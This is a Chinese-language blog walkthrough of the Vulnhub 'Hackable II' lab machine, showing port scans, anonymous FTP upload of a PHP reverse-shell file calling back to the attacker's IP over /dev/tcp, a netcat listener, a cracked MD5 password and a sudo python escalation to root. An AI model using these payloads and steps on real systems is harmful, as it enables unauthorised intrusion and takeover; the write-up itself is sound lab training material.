首页 > 其他分享 >【渗透测试】Vulnhub Hackable II

【渗透测试】Vulnhub Hackable II

时间:2024-08-19 17:49:19浏览次数:4  
标签:文件 php 192.168 II html Vulnhub shell Hackable shrek

渗透环境

攻击机:   IP: 192.168.216.129(Kali)
靶机:     IP:192.168.216.131
靶机下载地址:https://www.vulnhub.com/entry/hackable-ii,711/

进行渗透

一、 获取端口信息

该虚拟机导入VMware需要在拯救模式中重新配置一下网卡名称,附上教程,不再赘述:https://blog.csdn.net/liver100day/article/details/119109320

进行端口扫描

nmap -O -sV -p- -A 192.168.216.131

img

扫描WEB目录

img

img

打开CALL.html,没有什么发现

img

尝试使用nmap扫描FTP服务,看是否允许匿名登录

nmap --script ftp-anon 192.168.216.131

img

扫描结果表明该主机的FTP服务允许匿名登录,且匿名用户能够访问至少一个文件(CALL.html

登录FTP服务,用户名为anonymous,密码不用输入(直接敲回车)

img

二、 寻找WEB漏洞

查看文件,并下载CALL.html

dir
get CALL.html

img

下载后浏览CALL.html源码并未发现有用信息
尝试上传文件,在攻击机当前路径下写文件test.php,内容如下:

<?=phpinfo();?>

通过FTP上传到目标机器

put test.php

img

上传成功,且在/files/下可以看到该文件,访问该文件,发现可以成功解析

img

接下来的思路就比较清晰了,写一个PHP文件,触发时让目标机器反向连接我们的攻击机来反弹shell。
trojan.php,内容如下:

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.216.129/4444 0>&1'");?>

将其上传

put trojan.php

攻击机启动监听

nc -nlvp 4444

浏览器访问trojan.php,触发木马进行反向连接

img

成功反弹shell

三、 提权

接下来进入/home目录,可以看到一个shrek用户,另外还有一个important.txt

img

读取important.txt

img

提示我们运行/.runme.sh

img

后面的字符串显然是经过md5运算的,我们使用在线md5破解网站进行解码,得到密码:onion

img

创建交互式shell,切换到用户shrek

python3 -c 'import pty;pty.spawn("/bin/bash")'
su shrek

img

常规思路,查看一下具有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null

没有什么发现

img

查看shrek用户可执行的特权命令

sudo -l

img

写一个py文件root.py,内容如下:

echo 'import pty;pty.spawn("/bin/bash")' > root.py

该文件的作用就是打开一个交互式的shell

img

接下来执行

sudo /usr/bin/python3.5 /home/shrek/root.py

这里建议都使用绝对路径,相对路径有时无法成功执行。

这样就用root的身份登录了shell,渗透结束。

标签:文件,php,192.168,II,html,Vulnhub,shell,Hackable,shrek
From: https://www.cnblogs.com/MrSoap/p/18367799

相关文章

  • 11 IIC通讯协议
    目录前言一、IIC介绍1.IIC的时序2.使用IIC对从机寄存器的写操作流程3.使用IIC对从机寄存器的读操作流程二、软件实现IIC协议1.GPIO口配置2.IIC开始信号3.IIC结束信号4.发送数据5.接收数据6.接收ACK响应7.发送ACK和NACK响应8.对寄存器进行写处理9.对寄存器进行读处理三、硬件实现II......
  • Leetcode-552 学生出勤记录II
    Leetcode-552学生出勤记录II1.题目描述2.解题思路3.代码实现1.题目描述Leetcode-552学生出勤记录II2.解题思路(1)使用记忆化搜索来实现;(2)定义f[i][j][k]为右边填写j个A,且右边相邻位置有k个连续的L的情况下,向左填字母能构造多少个长为i的字符串;(3)对......
  • 【渗透测试】Vulnhub DarkHole
    渗透环境攻击机:   IP: 192.168.216.129(Kali)靶机:     IP:192.168.216.130靶机下载地址:https://www.vulnhub.com/entry/darkhole-1,724/进行渗透一、获取端口信息nmap或者arp-scan都能扫除IP,这里就不赘述了。先看看开放了哪些端口。nmap-O-sV-p--A192.......
  • ASCII和Unicode区别
    ASCII和Unicode的主要区别在于它们的编码范围、长度、兼容性、支持的语言种类以及编码方式。‌编码范围和长度‌:ASCII编码只能表示128个字符,包括英文字母、数字和一些标点符号,每个字符占用一个字节。而Unicode编码可以表示几乎所有语言的字符,包括拉丁文、中文、日文等,每个......
  • 【142. 环形链表 II 中等】
    题目:给定一个链表的头节点head,返回链表开始入环的第一个节点。如果链表无环,则返回null。如果链表中有某个节点,可以通过连续跟踪next指针再次到达,则链表中存在环。为了表示给定链表中的环,评测系统内部使用整数pos来表示链表尾连接到链表中的位置(索引从0开始)。如......
  • LeetCode 556. 下一个更大元素 III(next_permutation())
    题目:556.下一个更大元素III思路:用到next_permutation(),细节看注释。next_permutation、prev_permutationclassSolution{public:intnextGreaterElement(intn){ //转变为string类型,便于调用next_permutation()strings=to_string(n);......
  • (nice!!!)LeetCode 552. 学生出勤记录 II(动态规划dp递归版、记忆化dfs)
    题目:552.学生出勤记录II思路:记忆化搜索dfs,细节看注释classSolution{public:constintmod=1e9+7;//状态f[u][a][b]表示:在选择第u个位置前,缺勤次数为a次,且当前连续迟到次数为b次时,可以得到的合法出勤次数intf[100010][5][5];intdfs(intu,int......
  • iis7/8隐藏banner信息
    原文链接:https://www.cnblogs.com/kowloon/p/9071872.html一、隐藏server版本1、为什么要隐藏?答:服务器端返回信息中包含有软件版本等详细信息,攻击者利用这些信息可以实现更有目的性的攻击。因此隐藏server版本信息,在一定程度上能够提高服务器的安全性。2、未隐藏前查看到的信......
  • 题解:CF1034B Little C Loves 3 II
    思路看到这道题时,第一思路就是网络流,结果一看数据\(10^{9}\)直接转向找规律。主要思路:神秘特判。首先,下面的结论基于\(n\lem\)。Case1.当\(n=1\)时,易得的是我们可以以\(6\)为循环节构造。Case2.当\(n=2\)时,我们可以构造出\(4a,5a,6a\)的形式。易得,通过裴蜀......
  • Yuno loves sqrt technology III
    链接:YunolovessqrttechnologyIII先考虑一道分块板子[Violet]蒲公英在这道题中,将值离散化后,用了两个重要的数组\(p_{i,j}\):表示第\(i\)个块到第\(j\)个块的最小的众数\(s_{i,j}\):表示前\(i\)个块中\(j\)出现的次数发现\(s\)的空间是\(O(n\sqrt{n})\)的\(but......